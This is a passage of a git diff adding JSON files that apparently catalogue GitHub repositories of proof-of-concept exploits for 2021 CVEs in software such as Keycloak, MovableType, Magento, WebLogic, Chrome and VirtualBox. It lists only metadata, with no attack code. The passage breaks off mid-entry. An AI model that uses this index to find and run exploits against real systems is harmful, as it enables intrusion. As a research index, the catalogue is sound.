diff --git a/2021/CVE-2021-20323.json b/2021/CVE-2021-20323.json
new file mode 100644
index 0000000000..c03855e2b6
--- /dev/null
+++ b/2021/CVE-2021-20323.json
@@ -0,0 +1,69 @@
+[
+ {
+ "id": 575588355,
+ "name": "CVE-2021-20323",
+ "full_name": "ndmalc\/CVE-2021-20323",
+ "owner": {
+ "login": "ndmalc",
+ "id": 99986367,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99986367?v=4",
+ "html_url": "https:\/\/github.com\/ndmalc"
+ },
+ "html_url": "https:\/\/github.com\/ndmalc\/CVE-2021-20323",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-12-07T21:15:23Z",
+ "updated_at": "2024-04-15T20:49:16Z",
+ "pushed_at": "2022-12-07T21:26:44Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 742027806,
+ "name": "CVE-2021-20323",
+ "full_name": "Cappricio-Securities\/CVE-2021-20323",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2021-20323",
+ "description": "A POST based reflected Cross Site Scripting vulnerability on has been identified in Keycloak.",
+ "fork": false,
+ "created_at": "2024-01-11T16:02:07Z",
+ "updated_at": "2024-06-21T06:54:42Z",
+ "pushed_at": "2024-06-21T06:51:03Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-20323",
+ "keycloak",
+ "websecurity",
+ "xss",
+ "xss-vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-20717.json b/2021/CVE-2021-20717.json
new file mode 100644
index 0000000000..140d1308cb
--- /dev/null
+++ b/2021/CVE-2021-20717.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 371916803,
+ "name": "CVE-2021-20717",
+ "full_name": "s-index\/CVE-2021-20717",
+ "owner": {
+ "login": "s-index",
+ "id": 56715563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4",
+ "html_url": "https:\/\/github.com\/s-index"
+ },
+ "html_url": "https:\/\/github.com\/s-index\/CVE-2021-20717",
+ "description": "CVE-2021-20717-EC-CUBE-XSS",
+ "fork": false,
+ "created_at": "2021-05-29T08:08:21Z",
+ "updated_at": "2022-09-27T16:28:51Z",
+ "pushed_at": "2021-05-29T08:12:04Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-20837.json b/2021/CVE-2021-20837.json
new file mode 100644
index 0000000000..91071bc131
--- /dev/null
+++ b/2021/CVE-2021-20837.json
@@ -0,0 +1,125 @@
+[
+ {
+ "id": 421189251,
+ "name": "cve-2021-20837-poc",
+ "full_name": "ghost-nemesis\/cve-2021-20837-poc",
+ "owner": {
+ "login": "ghost-nemesis",
+ "id": 81393565,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81393565?v=4",
+ "html_url": "https:\/\/github.com\/ghost-nemesis"
+ },
+ "html_url": "https:\/\/github.com\/ghost-nemesis\/cve-2021-20837-poc",
+ "description": "PoC for the CVE-2021-20837 : RCE in MovableType",
+ "fork": false,
+ "created_at": "2021-10-25T21:25:39Z",
+ "updated_at": "2023-12-03T16:38:38Z",
+ "pushed_at": "2021-10-26T00:34:54Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 422835153,
+ "name": "CVE-2021-20837",
+ "full_name": "orangmuda\/CVE-2021-20837",
+ "owner": {
+ "login": "orangmuda",
+ "id": 91846073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4",
+ "html_url": "https:\/\/github.com\/orangmuda"
+ },
+ "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-20837",
+ "description": "XMLRPC - RCE in MovableTypePoC",
+ "fork": false,
+ "created_at": "2021-10-30T09:15:56Z",
+ "updated_at": "2023-09-28T11:32:47Z",
+ "pushed_at": "2022-03-21T13:23:03Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-20837",
+ "xmlrpc-api"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 423476431,
+ "name": "CVE-2021-20837",
+ "full_name": "Cosemz\/CVE-2021-20837",
+ "owner": {
+ "login": "Cosemz",
+ "id": 38556609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38556609?v=4",
+ "html_url": "https:\/\/github.com\/Cosemz"
+ },
+ "html_url": "https:\/\/github.com\/Cosemz\/CVE-2021-20837",
+ "description": "MovableType XMLRPC - RCE",
+ "fork": false,
+ "created_at": "2021-11-01T13:32:57Z",
+ "updated_at": "2021-11-02T09:10:19Z",
+ "pushed_at": "2021-11-02T09:10:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438109938,
+ "name": "CVE-2021-20837",
+ "full_name": "bb33bb\/CVE-2021-20837",
+ "owner": {
+ "login": "bb33bb",
+ "id": 5463104,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4",
+ "html_url": "https:\/\/github.com\/bb33bb"
+ },
+ "html_url": "https:\/\/github.com\/bb33bb\/CVE-2021-20837",
+ "description": "Unauthenticated RCE In MovableType",
+ "fork": false,
+ "created_at": "2021-12-14T03:54:28Z",
+ "updated_at": "2022-04-03T09:27:17Z",
+ "pushed_at": "2021-11-27T01:02:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21014.json b/2021/CVE-2021-21014.json
new file mode 100644
index 0000000000..76d43f21be
--- /dev/null
+++ b/2021/CVE-2021-21014.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 338510801,
+ "name": "CVE-2021-21014",
+ "full_name": "HoangKien1020\/CVE-2021-21014",
+ "owner": {
+ "login": "HoangKien1020",
+ "id": 24661746,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4",
+ "html_url": "https:\/\/github.com\/HoangKien1020"
+ },
+ "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2021-21014",
+ "description": "Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to a file upload restriction bypass. Successful exploitation could lead to arbitrary code execution by an authenticated attacker.",
+ "fork": false,
+ "created_at": "2021-02-13T06:16:39Z",
+ "updated_at": "2023-09-28T11:24:55Z",
+ "pushed_at": "2021-02-13T06:30:25Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21017.json b/2021/CVE-2021-21017.json
new file mode 100644
index 0000000000..3ac3a41271
--- /dev/null
+++ b/2021/CVE-2021-21017.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 342597395,
+ "name": "CVE-2021-21017",
+ "full_name": "ZeusBox\/CVE-2021-21017",
+ "owner": {
+ "login": "ZeusBox",
+ "id": 78951067,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78951067?v=4",
+ "html_url": "https:\/\/github.com\/ZeusBox"
+ },
+ "html_url": "https:\/\/github.com\/ZeusBox\/CVE-2021-21017",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-26T14:18:13Z",
+ "updated_at": "2023-09-28T11:25:18Z",
+ "pushed_at": "2021-02-27T09:57:00Z",
+ "stargazers_count": 45,
+ "watchers_count": 45,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 45,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 475487342,
+ "name": "CVE-2021-21017",
+ "full_name": "tzwlhack\/CVE-2021-21017",
+ "owner": {
+ "login": "tzwlhack",
+ "id": 86322859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86322859?v=4",
+ "html_url": "https:\/\/github.com\/tzwlhack"
+ },
+ "html_url": "https:\/\/github.com\/tzwlhack\/CVE-2021-21017",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-29T14:45:16Z",
+ "updated_at": "2022-03-29T14:45:28Z",
+ "pushed_at": "2022-03-29T14:45:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21042.json b/2021/CVE-2021-21042.json
new file mode 100644
index 0000000000..6a2811b15f
--- /dev/null
+++ b/2021/CVE-2021-21042.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 344380474,
+ "name": "CVE-2021-21042",
+ "full_name": "NattiSamson\/CVE-2021-21042",
+ "owner": {
+ "login": "NattiSamson",
+ "id": 45117900,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45117900?v=4",
+ "html_url": "https:\/\/github.com\/NattiSamson"
+ },
+ "html_url": "https:\/\/github.com\/NattiSamson\/CVE-2021-21042",
+ "description": "Exploit code for CVE-2021-21042",
+ "fork": false,
+ "created_at": "2021-03-04T07:01:08Z",
+ "updated_at": "2024-03-05T16:34:39Z",
+ "pushed_at": "2021-03-04T07:05:01Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 432305625,
+ "name": "CVE-2021-21042",
+ "full_name": "r1l4-i3pur1l4\/CVE-2021-21042",
+ "owner": {
+ "login": "r1l4-i3pur1l4",
+ "id": 76409019,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76409019?v=4",
+ "html_url": "https:\/\/github.com\/r1l4-i3pur1l4"
+ },
+ "html_url": "https:\/\/github.com\/r1l4-i3pur1l4\/CVE-2021-21042",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-26T21:31:18Z",
+ "updated_at": "2022-06-30T15:56:28Z",
+ "pushed_at": "2021-11-27T15:09:03Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21086.json b/2021/CVE-2021-21086.json
new file mode 100644
index 0000000000..3aafa0b946
--- /dev/null
+++ b/2021/CVE-2021-21086.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 434332397,
+ "name": "Exploit-CVE-2021-21086",
+ "full_name": "infobyte\/Exploit-CVE-2021-21086",
+ "owner": {
+ "login": "infobyte",
+ "id": 4226354,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4226354?v=4",
+ "html_url": "https:\/\/github.com\/infobyte"
+ },
+ "html_url": "https:\/\/github.com\/infobyte\/Exploit-CVE-2021-21086",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-02T18:30:53Z",
+ "updated_at": "2024-03-16T01:39:41Z",
+ "pushed_at": "2021-12-02T18:46:48Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 10
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-2109.json b/2021/CVE-2021-2109.json
new file mode 100644
index 0000000000..b05d7fba73
--- /dev/null
+++ b/2021/CVE-2021-2109.json
@@ -0,0 +1,187 @@
+[
+ {
+ "id": 331847444,
+ "name": "CVE-2021-2109",
+ "full_name": "Al1ex\/CVE-2021-2109",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-2109",
+ "description": "CVE-2021-2109 && Weblogic Server RCE via JNDI",
+ "fork": false,
+ "created_at": "2021-01-22T05:37:11Z",
+ "updated_at": "2024-01-12T11:27:20Z",
+ "pushed_at": "2021-01-22T05:52:26Z",
+ "stargazers_count": 31,
+ "watchers_count": 31,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-2109",
+ "jndi",
+ "rce",
+ "weblogic"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 31,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 331873303,
+ "name": "CVE-2021-2109",
+ "full_name": "rabbitsafe\/CVE-2021-2109",
+ "owner": {
+ "login": "rabbitsafe",
+ "id": 33046073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33046073?v=4",
+ "html_url": "https:\/\/github.com\/rabbitsafe"
+ },
+ "html_url": "https:\/\/github.com\/rabbitsafe\/CVE-2021-2109",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-22T07:43:46Z",
+ "updated_at": "2023-09-28T11:24:12Z",
+ "pushed_at": "2021-01-22T08:34:11Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 367086891,
+ "name": "CVE-2021-2109_poc",
+ "full_name": "yuaneuro\/CVE-2021-2109_poc",
+ "owner": {
+ "login": "yuaneuro",
+ "id": 42265015,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42265015?v=4",
+ "html_url": "https:\/\/github.com\/yuaneuro"
+ },
+ "html_url": "https:\/\/github.com\/yuaneuro\/CVE-2021-2109_poc",
+ "description": "weblogic CVE-2021-2109批量验证poc",
+ "fork": false,
+ "created_at": "2021-05-13T15:10:03Z",
+ "updated_at": "2023-09-28T11:27:38Z",
+ "pushed_at": "2021-05-14T04:27:23Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 394257292,
+ "name": "CVE-2021-2109",
+ "full_name": "dinosn\/CVE-2021-2109",
+ "owner": {
+ "login": "dinosn",
+ "id": 3851678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4",
+ "html_url": "https:\/\/github.com\/dinosn"
+ },
+ "html_url": "https:\/\/github.com\/dinosn\/CVE-2021-2109",
+ "description": "CVE-2021-2109 basic scanner",
+ "fork": false,
+ "created_at": "2021-08-09T11:02:45Z",
+ "updated_at": "2023-09-28T11:30:20Z",
+ "pushed_at": "2021-08-09T11:33:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 475591127,
+ "name": "CVE-2021-2109",
+ "full_name": "coco0x0a\/CVE-2021-2109",
+ "owner": {
+ "login": "coco0x0a",
+ "id": 96345719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96345719?v=4",
+ "html_url": "https:\/\/github.com\/coco0x0a"
+ },
+ "html_url": "https:\/\/github.com\/coco0x0a\/CVE-2021-2109",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-29T19:29:29Z",
+ "updated_at": "2022-03-29T21:05:01Z",
+ "pushed_at": "2022-03-29T21:04:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 530633500,
+ "name": "oracle-weblogic-CVE-2021-2109",
+ "full_name": "Vulnmachines\/oracle-weblogic-CVE-2021-2109",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/oracle-weblogic-CVE-2021-2109",
+ "description": "Oracle Weblogic RCE - CVE-2022-2109",
+ "fork": false,
+ "created_at": "2022-08-30T11:50:17Z",
+ "updated_at": "2023-01-11T16:07:19Z",
+ "pushed_at": "2022-08-30T11:52:05Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21110.json b/2021/CVE-2021-21110.json
new file mode 100644
index 0000000000..487cf23ce5
--- /dev/null
+++ b/2021/CVE-2021-21110.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 340540711,
+ "name": "CVE-2021-21110",
+ "full_name": "Gh0st0ne\/CVE-2021-21110",
+ "owner": {
+ "login": "Gh0st0ne",
+ "id": 47971115,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47971115?v=4",
+ "html_url": "https:\/\/github.com\/Gh0st0ne"
+ },
+ "html_url": "https:\/\/github.com\/Gh0st0ne\/CVE-2021-21110",
+ "description": "CVE-2021-21110 : Tiki Wiki CMS GroupWare Serverside Template Injection Remote Code Execution Exploit",
+ "fork": false,
+ "created_at": "2021-02-20T02:19:40Z",
+ "updated_at": "2024-01-16T16:26:57Z",
+ "pushed_at": "2021-02-20T02:20:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21123.json b/2021/CVE-2021-21123.json
new file mode 100644
index 0000000000..deb50f6bbe
--- /dev/null
+++ b/2021/CVE-2021-21123.json
@@ -0,0 +1,47 @@
+[
+ {
+ "id": 350325088,
+ "name": "CVE-2021-21123-PoC-Google-Chrome",
+ "full_name": "Puliczek\/CVE-2021-21123-PoC-Google-Chrome",
+ "owner": {
+ "login": "Puliczek",
+ "id": 12344862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12344862?v=4",
+ "html_url": "https:\/\/github.com\/Puliczek"
+ },
+ "html_url": "https:\/\/github.com\/Puliczek\/CVE-2021-21123-PoC-Google-Chrome",
+ "description": "🐱💻 👍 Google Chrome - File System Access API - vulnerabilities reported by Maciej Pulikowski | Total Bug Bounty Reward: $5.000 | CVE-2021-21123 and 5 more...",
+ "fork": false,
+ "created_at": "2021-03-22T11:53:57Z",
+ "updated_at": "2024-04-09T12:36:00Z",
+ "pushed_at": "2021-03-22T18:24:20Z",
+ "stargazers_count": 166,
+ "watchers_count": 166,
+ "has_discussions": false,
+ "forks_count": 29,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "bugbounty-writeups",
+ "bugbountytips",
+ "cve",
+ "cybersecurity",
+ "exploit",
+ "hacking",
+ "payload",
+ "pentesing",
+ "pentest",
+ "red-team",
+ "security",
+ "security-writeups",
+ "writeups"
+ ],
+ "visibility": "public",
+ "forks": 29,
+ "watchers": 166,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21148.json b/2021/CVE-2021-21148.json
new file mode 100644
index 0000000000..321888fbe5
--- /dev/null
+++ b/2021/CVE-2021-21148.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 336754176,
+ "name": "CVE-2021-21148",
+ "full_name": "Grayhaxor\/CVE-2021-21148",
+ "owner": {
+ "login": "Grayhaxor",
+ "id": 74397435,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74397435?v=4",
+ "html_url": "https:\/\/github.com\/Grayhaxor"
+ },
+ "html_url": "https:\/\/github.com\/Grayhaxor\/CVE-2021-21148",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-07T09:59:47Z",
+ "updated_at": "2022-04-20T06:48:02Z",
+ "pushed_at": "2021-02-07T10:03:16Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-2119.json b/2021/CVE-2021-2119.json
new file mode 100644
index 0000000000..7a32a010a7
--- /dev/null
+++ b/2021/CVE-2021-2119.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 329979678,
+ "name": "RWCTF21-VirtualBox-61-escape",
+ "full_name": "Sauercloud\/RWCTF21-VirtualBox-61-escape",
+ "owner": {
+ "login": "Sauercloud",
+ "id": 41395211,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41395211?v=4",
+ "html_url": "https:\/\/github.com\/Sauercloud"
+ },
+ "html_url": "https:\/\/github.com\/Sauercloud\/RWCTF21-VirtualBox-61-escape",
+ "description": "0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020\/2021 CVE-2021-2119",
+ "fork": false,
+ "created_at": "2021-01-15T17:32:24Z",
+ "updated_at": "2024-04-16T12:34:59Z",
+ "pushed_at": "2021-01-23T01:25:22Z",
+ "stargazers_count": 140,
+ "watchers_count": 140,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 140,
+ "score": 0,
+ "subscribers_count": 10
+ },
+ {
+ "id": 471867550,
+ "name": "Sauercloude",
+ "full_name": "chatbottesisgmailh\/Sauercloude",
+ "owner": {
+ "login": "chatbottesisgmailh",
+ "id": 101959431,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101959431?v=4",
+ "html_url": "https:\/\/github.com\/chatbottesisgmailh"
+ },
+ "html_url": "https:\/\/github.com\/chatbottesisgmailh\/Sauercloude",
+ "description": "0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020\/2021 CVE-2021-2119",
+ "fork": false,
+ "created_at": "2022-03-20T03:17:03Z",
+ "updated_at": "2022-03-20T03:17:04Z",
+ "pushed_at": "2022-03-20T03:17:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 477297752,
+ "name": "Sauercloude",
+ "full_name": "shi10587s\/Sauercloude",
+ "owner": {
+ "login": "shi10587s",
+ "id": 102901010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102901010?v=4",
+ "html_url": "https:\/\/github.com\/shi10587s"
+ },
+ "html_url": "https:\/\/github.com\/shi10587s\/Sauercloude",
+ "description": "0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020\/2021 CVE-2021-2119",
+ "fork": false,
+ "created_at": "2022-04-03T09:46:03Z",
+ "updated_at": "2022-04-03T09:46:03Z",
+ "pushed_at": "2022-04-03T09:46:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21193.json b/2021/CVE-2021-21193.json
new file mode 100644
index 0000000000..1af5fbc038
--- /dev/null
+++ b/2021/CVE-2021-21193.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 474836947,
+ "name": "CVE-2021-21193",
+ "full_name": "mehrzad1994\/CVE-2021-21193",
+ "owner": {
+ "login": "mehrzad1994",
+ "id": 19632843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19632843?v=4",
+ "html_url": "https:\/\/github.com\/mehrzad1994"
+ },
+ "html_url": "https:\/\/github.com\/mehrzad1994\/CVE-2021-21193",
+ "description": "introduction to hacking second presentation",
+ "fork": false,
+ "created_at": "2022-03-28T03:51:58Z",
+ "updated_at": "2022-03-28T03:51:58Z",
+ "pushed_at": "2022-03-28T13:06:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21220.json b/2021/CVE-2021-21220.json
new file mode 100644
index 0000000000..197470ce16
--- /dev/null
+++ b/2021/CVE-2021-21220.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 406597081,
+ "name": "CVE-2021-21220",
+ "full_name": "security-dbg\/CVE-2021-21220",
+ "owner": {
+ "login": "security-dbg",
+ "id": 82885694,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82885694?v=4",
+ "html_url": "https:\/\/github.com\/security-dbg"
+ },
+ "html_url": "https:\/\/github.com\/security-dbg\/CVE-2021-21220",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-15T03:11:41Z",
+ "updated_at": "2023-07-27T06:33:21Z",
+ "pushed_at": "2021-09-15T03:22:06Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21234.json b/2021/CVE-2021-21234.json
new file mode 100644
index 0000000000..a49f40dd28
--- /dev/null
+++ b/2021/CVE-2021-21234.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 375059494,
+ "name": "CVE-2021-21234",
